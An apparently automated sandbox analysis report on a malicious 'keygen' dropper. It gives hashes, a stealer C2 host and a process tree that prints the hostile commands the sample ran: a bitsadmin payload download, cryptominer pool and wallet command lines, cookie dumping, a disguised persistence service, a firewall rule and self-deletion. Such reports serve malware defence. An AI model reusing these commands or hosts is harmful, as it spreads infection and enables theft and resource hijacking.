Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    26s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-04-2021 16:03

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 14 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2700
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2788
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2424
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2372
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1864
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1452
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1356
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1212
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1152
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1060
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:364
                      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1704
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:2448
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            3⤵
                            • Loads dropped DLL
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4068
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2248
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:4316
                          • C:\Users\Admin\AppData\Local\Temp\is-QSGRV.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-QSGRV.tmp\Install.tmp" /SL5="$401A4,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:4348
                            • C:\Users\Admin\AppData\Local\Temp\is-6NH6V.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-6NH6V.tmp\Ultra.exe" /S /UID=burnerch1
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Drops file in Program Files directory
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4432
                              • C:\Program Files\Uninstall Information\OZRAFRUTLG\ultramediaburner.exe
                                "C:\Program Files\Uninstall Information\OZRAFRUTLG\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4616
                                • C:\Users\Admin\AppData\Local\Temp\is-H3IQG.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-H3IQG.tmp\ultramediaburner.tmp" /SL5="$301FA,281924,62464,C:\Program Files\Uninstall Information\OZRAFRUTLG\ultramediaburner.exe" /VERYSILENT
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:4652
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4688
                              • C:\Users\Admin\AppData\Local\Temp\fa-2bcf7-7e1-6679a-1768173c6be86\Sosuqumaebi.exe
                                "C:\Users\Admin\AppData\Local\Temp\fa-2bcf7-7e1-6679a-1768173c6be86\Sosuqumaebi.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4724
                              • C:\Users\Admin\AppData\Local\Temp\9a-bb514-5f0-bbea1-9eec01c21f570\Vaegaejumulae.exe
                                "C:\Users\Admin\AppData\Local\Temp\9a-bb514-5f0-bbea1-9eec01c21f570\Vaegaejumulae.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:4780
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slkbu1pe.niw\instEU.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4608
                                  • C:\Users\Admin\AppData\Local\Temp\slkbu1pe.niw\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\slkbu1pe.niw\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4492
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wme45vft.hdk\google-game.exe & exit
                                  6⤵
                                    PID:4456
                                    • C:\Users\Admin\AppData\Local\Temp\wme45vft.hdk\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\wme45vft.hdk\google-game.exe
                                      7⤵
                                        PID:3412
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          8⤵
                                            PID:208
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hfkhdhrr.0qn\y1.exe & exit
                                        6⤵
                                          PID:4288
                                          • C:\Users\Admin\AppData\Local\Temp\hfkhdhrr.0qn\y1.exe
                                            C:\Users\Admin\AppData\Local\Temp\hfkhdhrr.0qn\y1.exe
                                            7⤵
                                              PID:6060
                                              • C:\Users\Admin\AppData\Local\Temp\JP6KFHY5OK.exe
                                                "C:\Users\Admin\AppData\Local\Temp\JP6KFHY5OK.exe"
                                                8⤵
                                                  PID:5976
                                                  • C:\Users\Admin\AppData\Roaming\1619366530781.exe
                                                    "C:\Users\Admin\AppData\Roaming\1619366530781.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619366530781.txt"
                                                    9⤵
                                                      PID:2456
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\JP6KFHY5OK.exe"
                                                      9⤵
                                                        PID:5736
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 127.0.0.1 -n 3
                                                          10⤵
                                                          • Runs ping.exe
                                                          PID:4384
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\hfkhdhrr.0qn\y1.exe"
                                                      8⤵
                                                        PID:4884
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          9⤵
                                                          • Delays execution with timeout.exe
                                                          PID:5696
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s2ntu3yk.n01\askinstall39.exe & exit
                                                    6⤵
                                                      PID:5560
                                                      • C:\Users\Admin\AppData\Local\Temp\s2ntu3yk.n01\askinstall39.exe
                                                        C:\Users\Admin\AppData\Local\Temp\s2ntu3yk.n01\askinstall39.exe
                                                        7⤵
                                                          PID:5416
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            8⤵
                                                              PID:212
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                9⤵
                                                                • Kills process with taskkill
                                                                PID:4552
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ajyqcuuh.op2\inst.exe & exit
                                                          6⤵
                                                            PID:4012
                                                            • C:\Users\Admin\AppData\Local\Temp\ajyqcuuh.op2\inst.exe
                                                              C:\Users\Admin\AppData\Local\Temp\ajyqcuuh.op2\inst.exe
                                                              7⤵
                                                                PID:4796
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4k0e4ob.bof\SunLabsPlayer.exe /S & exit
                                                              6⤵
                                                                PID:3120
                                                                • C:\Users\Admin\AppData\Local\Temp\y4k0e4ob.bof\SunLabsPlayer.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\y4k0e4ob.bof\SunLabsPlayer.exe /S
                                                                  7⤵
                                                                    PID:5384
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssCCAE.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4248
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssCCAE.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2276
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssCCAE.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4280
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssCCAE.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4604
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssCCAE.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:2796
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssCCAE.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4904
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssCCAE.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5392
                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                    8⤵
                                                                                    • Download via BitsAdmin
                                                                                    PID:4284
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xpsbmzqw.llh\GcleanerWW.exe /mixone & exit
                                                                                6⤵
                                                                                  PID:4664
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxlio2jc.vc3\toolspab1.exe & exit
                                                                                  6⤵
                                                                                    PID:4960
                                                                                    • C:\Users\Admin\AppData\Local\Temp\yxlio2jc.vc3\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\yxlio2jc.vc3\toolspab1.exe
                                                                                      7⤵
                                                                                        PID:5136
                                                                                        • C:\Users\Admin\AppData\Local\Temp\yxlio2jc.vc3\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\yxlio2jc.vc3\toolspab1.exe
                                                                                          8⤵
                                                                                            PID:4804
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmb05b14.sqe\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:4476
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmb05b14.sqe\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\tmb05b14.sqe\c7ae36fa.exe
                                                                                            7⤵
                                                                                              PID:6124
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pkegakii.2it\app.exe /8-2222 & exit
                                                                                            6⤵
                                                                                              PID:3744
                                                                                              • C:\Users\Admin\AppData\Local\Temp\pkegakii.2it\app.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\pkegakii.2it\app.exe /8-2222
                                                                                                7⤵
                                                                                                  PID:4360
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\pkegakii.2it\app.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\pkegakii.2it\app.exe" /8-2222
                                                                                                    8⤵
                                                                                                      PID:5076
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies system certificate store
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4880
                                                                                          • C:\Users\Admin\AppData\Roaming\6FB7.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\6FB7.tmp.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4700
                                                                                            • C:\Users\Admin\AppData\Roaming\6FB7.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\6FB7.tmp.exe"
                                                                                              4⤵
                                                                                                PID:6068
                                                                                            • C:\Users\Admin\AppData\Roaming\7268.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\7268.tmp.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5252
                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w4136@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                4⤵
                                                                                                  PID:5616
                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w10570 --cpu-max-threads-hint 50 -r 9999
                                                                                                  4⤵
                                                                                                    PID:5804
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                  3⤵
                                                                                                    PID:5604
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping 127.0.0.1
                                                                                                      4⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:5884
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                  2⤵
                                                                                                    PID:5028
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                    2⤵
                                                                                                      PID:6116
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                          PID:2404
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                            PID:4452
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                        1⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:680
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                          2⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Checks processor information in registry
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Modifies registry class
                                                                                                          PID:2140
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:4132
                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        PID:4176
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:4888
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        • Modifies registry class
                                                                                                        PID:4528
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                        1⤵
                                                                                                          PID:2248
                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:6016
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                              PID:5600
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                                PID:5300
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                1⤵
                                                                                                                  PID:4572
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BA77.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BA77.exe
                                                                                                                  1⤵
                                                                                                                    PID:6080
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BC8B.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BC8B.exe
                                                                                                                    1⤵
                                                                                                                      PID:2888
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BD57.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\BD57.exe
                                                                                                                      1⤵
                                                                                                                        PID:2432
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\Users\Admin\AppData\Local\f1baf7bf-acdd-41d2-a969-9625ca19e161" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                          2⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:4788
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C6FD.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\C6FD.exe
                                                                                                                        1⤵
                                                                                                                          PID:4464
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D084.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D084.exe
                                                                                                                          1⤵
                                                                                                                            PID:4388
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vntdkozk\
                                                                                                                              2⤵
                                                                                                                                PID:4596
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\smmdoxoq.exe" C:\Windows\SysWOW64\vntdkozk\
                                                                                                                                2⤵
                                                                                                                                  PID:5668
                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                  "C:\Windows\System32\sc.exe" create vntdkozk binPath= "C:\Windows\SysWOW64\vntdkozk\smmdoxoq.exe /d\"C:\Users\Admin\AppData\Local\Temp\D084.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                  2⤵
                                                                                                                                    PID:5028
                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                    "C:\Windows\System32\sc.exe" description vntdkozk "wifi internet conection"
                                                                                                                                    2⤵
                                                                                                                                      PID:5240
                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                      "C:\Windows\System32\sc.exe" start vntdkozk
                                                                                                                                      2⤵
                                                                                                                                        PID:5132
                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                        2⤵
                                                                                                                                          PID:5884
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D1CD.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D1CD.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:4060
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E1EB.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E1EB.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:5480
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EB62.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\EB62.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:4428
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:4972
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F69E.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\F69E.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:4424
                                                                                                                                                • C:\Windows\SysWOW64\vntdkozk\smmdoxoq.exe
                                                                                                                                                  C:\Windows\SysWOW64\vntdkozk\smmdoxoq.exe /d"C:\Users\Admin\AppData\Local\Temp\D084.exe"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3744
                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      svchost.exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4472

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                    Persistence

                                                                                                                                                    New Service

                                                                                                                                                    1
                                                                                                                                                    T1050

                                                                                                                                                    Modify Existing Service

                                                                                                                                                    1
                                                                                                                                                    T1031

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1060

                                                                                                                                                    BITS Jobs

